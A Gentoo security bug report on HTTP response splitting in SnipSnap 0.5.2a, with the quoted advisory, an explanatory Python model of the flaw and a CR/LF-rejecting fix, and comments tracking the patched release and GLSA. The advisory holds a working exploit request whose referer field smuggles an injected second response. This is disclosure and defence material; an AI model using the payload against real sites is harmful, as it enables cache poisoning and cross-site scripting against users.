Bug 64154 - dev-java/snipsnap-bin: http response splitting
Summary: dev-java/snipsnap-bin: http response splitting
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All (OS: All)
Importance: High minor (priority / severity)
Assignee: Gentoo Security
URL: http://www.securityfocus.com/archive/...
Whiteboard: B3 [glsa] lewk
Keywords:
Depends on:
Blocks:
 
Reported: 2004-09-15 10:30 UTC by Luke Macken (RETIRED)
Modified: 2011-10-30 22:38 UTC
See Also:
Package list:
Runtime testing required: ---
Description Luke Macken (RETIRED) gentoo-dev 2004-09-15 10:30:50 UTC
ADVISORY
 
Author: Maestro (me!)

Date: 14-SEP-04
 
Vendor: SnipSnap (www.snipsnap.org)
 
Product: SnipSnap 0.5.2a

Product description (from vendor website):
SnipSnap is a free and easy to install weblog and wiki tool written in Java.

Problem: HTTP response splitting (web cache poisoning, XSS, yadayadayada) -

http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
 
Exploit:

POST /exec/authenticate HTTP/1.0
Host: cringe.dnsalias.com
Content-Type: application/x-www-form-urlencoded
Content-length: 197

referer=abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:20%0d%0a%0d%0a{html}0wned!!{/html}&cancel=cancel


(replace curly braces with lessthan and greaterthan)

Vendor status: vendor fixed in version 1.0B1. From vendor website:
Tuesday, 14. September 2004
SnipSnap 1.0b1 (uttoxeter) released 
SnipSnap version 1.0b1 has just been released. This release was necessary due to the demand to get updates from 0.5.2a and a security issue known as HTTP response splitting found by someone called Maestro De-Seguridad.
--
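The splitting mechanism behind the request in the advisory above, as an added example that is not part of this bug report and not SnipSnap's code: a hypothetical redirect handler that copies the `referer` form parameter into a `Location` header unchanged, a minimal parser that reads the resulting byte stream the way a keep-alive client or caching proxy would, and the same handler with the check that refuses the injected CR/LF. The handler, the parser and the assumption that the `cancel` branch of `/exec/authenticate` redirects to the referer are illustrative; only the payload is taken from the advisory.

```python
from urllib.parse import unquote

# Payload from the advisory's POST body (curly braces replaced with < and >),
# URL-decoded as a form parser would hand it to the application. The injected
# "Connection"/"Content-Length: 0" lines terminate the server's real response
# cleanly, so everything after the blank line is read as a second response.
ADVISORY_REFERER = unquote(
    "abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:20"
    "%0d%0a%0d%0a<html>0wned!!</html>"
)


def build_redirect_naive(referer: str) -> bytes:
    """Hypothetical vulnerable handler (assumed, not SnipSnap's code): the cancel
    branch of a login form bounces the browser back to the referer, splicing the
    untrusted value straight into the Location header."""
    response = (
        "HTTP/1.0 302 Found\r\n"
        f"Location: {referer}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return response.encode("latin-1")


def is_safe_header_value(value: str) -> bool:
    """Reject CR, LF and every other control character: any of them can end a
    header line or the whole header block in a lenient parser."""
    return not any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value)


def build_redirect_safe(referer: str) -> bytes:
    """Hardened handler: refuse to emit a header containing control characters."""
    if not is_safe_header_value(referer):
        raise ValueError("control character in redirect target")
    return build_redirect_naive(referer)


def parse_responses(stream: bytes) -> list[dict]:
    """Split a byte stream into HTTP responses as a keep-alive client or caching
    proxy would: status line, headers up to the blank line, then exactly
    Content-Length bytes of body, repeated until the stream ends."""
    responses = []
    pos = 0
    while pos < len(stream):
        # Tolerate stray CRLF between messages, as lenient parsers do.
        while stream.startswith(b"\r\n", pos):
            pos += 2
        if not stream.startswith(b"HTTP/", pos):
            break  # trailing bytes that do not start a response are discarded
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end < 0:
            break
        lines = stream[pos:head_end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = head_end + 4
        body = stream[body_start:body_start + length].decode("latin-1")
        responses.append({"status": lines[0], "headers": headers, "body": body})
        pos = body_start + length
    return responses


if __name__ == "__main__":
    for i, r in enumerate(parse_responses(build_redirect_naive(ADVISORY_REFERER))):
        print(f"response {i}: {r['status']} headers={r['headers']} body={r['body']!r}")
    try:
        build_redirect_safe(ADVISORY_REFERER)
    except ValueError as exc:
        print("hardened handler refused the payload:", exc)
```

Run stand-alone, the naive handler's single write is parsed as two responses: the 302 the server meant to send, and a 200 with a `text/html` body written entirely by the attacker. A shared cache that pairs that second response with the next request on the connection stores attacker content under a victim URL, which is the cache-poisoning case the linked whitepaper describes; the same body serves as XSS when a browser renders it. Current servlet containers and HTTP libraries reject CR/LF in header values themselves, but that protection lives in the framework, so the control-character check still belongs at the point where untrusted input meets a header.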
Comment 1 Thierry Carrez (RETIRED) gentoo-dev 2004-09-15 11:54:11 UTC
Java herd, please bump to release 1.0B1.
Comment 2 Thomas Matthijs (RETIRED) gentoo-dev 2004-09-15 16:00:48 UTC
bumped
Comment 3 Luke Macken (RETIRED) gentoo-dev 2004-09-15 16:19:35 UTC
arches, please mark stable.
Comment 4 Thomas Matthijs (RETIRED) gentoo-dev 2004-09-16 00:36:13 UTC
stabled
Comment 5 Jochen Maes (RETIRED) gentoo-dev 2004-09-16 01:12:37 UTC
stable on ppc, x86
java and ppc removed from cc.
Comment 6 Thierry Carrez (RETIRED) gentoo-dev 2004-09-16 01:26:56 UTC
Ready for a GLSA decision
Comment 7 Thierry Carrez (RETIRED) gentoo-dev 2004-09-16 05:46:48 UTC
Yes, a GLSA is needed. lewk, the draft is yours.
Comment 8 Kurt Lieber (RETIRED) gentoo-dev 2004-09-17 05:52:40 UTC
glsa 200409-23